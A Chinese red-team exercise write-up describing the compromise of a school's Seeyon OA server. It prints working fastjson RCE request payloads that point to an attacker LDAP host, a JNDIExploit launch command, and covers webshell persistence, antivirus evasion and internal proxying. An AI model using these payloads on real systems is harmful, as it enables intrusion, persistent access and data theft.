攻防演练实战之梅开二度-致远OA-rce

admin 2022年12月5日22:26:30安全文章评论27 views3255字阅读10分51秒阅读模式
前言

好久没有写文章了。

1.最近入了很多众测。安心挖洞。

2.没有比赛就没有什么好文章输出。

这不刚结束就写文章给表哥们了。


环境介绍

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce

其中目标是一个学校,不止一次的被打过了。

这次肯定是修复了。


上次手法

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce

对学校进行攻防的手法,离不开信息收集。

google语法:

site:xxx.edu.cn xxx系统/xxx平台

举例:


攻防演练实战之梅开二度-致远OA-rce

运气好,还是可以登录。这种一般都是账号多用,各种平台/云盘之类的。进了后台就简单多了。


攻防开始

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce


利用上次的手段是行不通了,只能慢慢的找点。这次利用外网致远oa系统。


第一次尝试

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce


很顺利的发现了fastjson-rce的漏洞。


攻防演练实战之梅开二度-致远OA-rce

执行命令这里需要用到JNDIExploit。在vps启动JNDIExploit

java -jar JNDIExploit-1.2-SNAPSHOT.jar -p port -i ip


攻防演练实战之梅开二度-致远OA-rce

借助工具可以进行命令执行。


攻防演练实战之梅开二度-致远OA-rce


第一次很成功的执行了。利用ps成功上线。

这里ps把脚本和命令都进行简单的免杀和分块即可。可以看我之前的文章。


梅开二度

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce


但是没过多久,就掉线了。

因为第一天就拿到了6个shell。很忙。

维权做的不好。都是上线留着之后再打。

继续之前的操作,发现无法成功执行命令。


攻防演练实战之梅开二度-致远OA-rce

梅开二度-继续研究

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce


这里还是主动尝试了手动,使用代理抓去oa中的poc,和网上的poc是一致的。

路径:/seeyon/sursenServlet


POST /seeyon/sursenServlet HTTP/1.1
sursenData=%7B%22name%22%3A%7B%22%5Cu0040%5Cu0074%5Cu0079%5Cu0070%5Cu0065%22%3A%22%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0043%5Cu006c%5Cu0061%5Cu0073%5Cu0073%22%2C%22%5Cu0076%5Cu0061%5Cu006c%22%3A%22%5Cu0063%5Cu006f%5Cu006d%5Cu002e%5Cu0073%5Cu0075%5Cu006e%5Cu002e%5Cu0072%5Cu006f%5Cu0077%5Cu0073%5Cu0065%5Cu0074%5Cu002e%5Cu004a%5Cu0064%5Cu0062%5Cu0063%5Cu0052%5Cu006f%5Cu0077%5Cu0053%5Cu0065%5Cu0074%5Cu0049%5Cu006d%5Cu0070%5Cu006c%22%7D%2C%22x%22%3A%7B%22%5Cu0040%5Cu0074%5Cu0079%5Cu0070%5Cu0065%22%3A%22%5Cu0063%5Cu006f%5Cu006d%5Cu002e%5Cu0073%5Cu0075%5Cu006e%5Cu002e%5Cu0072%5Cu006f%5Cu0077%5Cu0073%5Cu0065%5Cu0074%5Cu002e%5Cu004a%5Cu0064%5Cu0062%5Cu0063%5Cu0052%5Cu006f%5Cu0077%5Cu0053%5Cu0065%5Cu0074%5Cu0049%5Cu006d%5Cu0070%5Cu006c%22%2C%22%5Cu0064%5Cu0061%5Cu0074%5Cu0061%5Cu0053%5Cu006f%5Cu0075%5Cu0072%5Cu0063%5Cu0065%5Cu004e%5Cu0061%5Cu006d%5Cu0065":"ldap://xxxx","autoCommit":true}}


测试发现,dnslog都无法通信。经过不断的尝试,推测这条路被堵上了。就换另一个方式。


梅开二度-getshell

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce


这里继续尝试的fastjson的第二种rce方式。

以下poc均来自网络

路径:

/seeyon/main.do?method=changeLocale


poc:

POST /seeyon/main.do?method=changeLocale HTTP/1.1

Host: 127.0.0.1:81

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

cmd: net user

Content-Length: 713


_json_params={"name":{"u0040u0074u0079u0070u0065":"u006au0061u0076u0061u002eu006cu0061u006eu0067u002eu0043u006cu0061u0073u0073","u0076u0061u006c":"u0063u006fu006du002eu0073u0075u006eu002eu0072u006fu0077u0073u0065u0074u002eu004au0064u0062u0063u0052u006fu0077u0053u0065u0074u0049u006du0070u006c"},"x":{"u0040u0074u0079u0070u0065":"u0063u006fu006du002eu0073u0075u006eu002eu0072u006fu0077u0073u0065u0074u002eu004au0064u0062u0063u0052u006fu0077u0053u0065u0074u0049u006du0070u006c","u0064u0061u0074u0061u0053u006fu0075u0072u0063u0065u004eu0061u006du0065":"ldap://xx.xx.xx.xx","autoCommit":true}}


攻防演练实战之梅开二度-致远OA-rce

发现dnslog也是无法响应的,不断的摸索。发现不同版本的poc方式不同。

下图来自网络。


攻防演练实战之梅开二度-致远OA-rce

利用上述提供的poc

在这里进行了遍历进行dnslog回显。发现成功回来。


攻防演练实战之梅开二度-致远OA-rce

这里要多个服务器.多次尝试会触发防火墙。导致服务器被拉黑。

然后使用JNDIExploit进行命令执行就可以了。成功上线


攻防演练实战之梅开二度-致远OA-rce

上次吃了教训,这次直接去放了一个webshell进去。

致远oa-webshell路径:

webappsseeyon


内网

攻防演练实战之梅开二度-致远OA-rce
攻防演练实战之梅开二度-致远OA-rce


内网没有什么亮点。这里使用了正向re代理进去。

扫描-登录服务器-翻文件-找密码。

唯一需要注意的是二层多层代理的操作。不同业务内网。需要多层代理。

对了还有fscan的免杀.这次攻防原来的fscan一直无法运行。


挖洞表哥滴滴我

一起交流呀。


任何不明白,后台请私信。





关于文章/Tools获取方式:请关注交流群或者知识星球。











关于交流群:因为某些原因,更改一下交流群的获取方式


  1. 请点击联系我们->联系官方->客服小助手添加二维码拉群 。  

攻防演练实战之梅开二度-致远OA-rce







关于知识星球的获取方式


  1. 后台回复发送 "知识星球",即可获取知识星球二维码。不定时发送免费名额。

  2. 如若上述方式不行,请点击联系我们->联系官方->客服小助手添加二维码进入星球 。  

攻防演练实战之梅开二度-致远OA-rce








免责声明


        


本公众号文章以技术分享学习为目的。

由于传播、利用本公众号发布文章而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任。

一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!





攻防演练实战之梅开二度-致远OA-rce


原文始发于微信公众号(极梦C):攻防演练实战之梅开二度-致远OA-rce

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月5日22:26:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  攻防演练实战之梅开二度-致远OA-rce https://cn-sec.com/archives/1445913.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: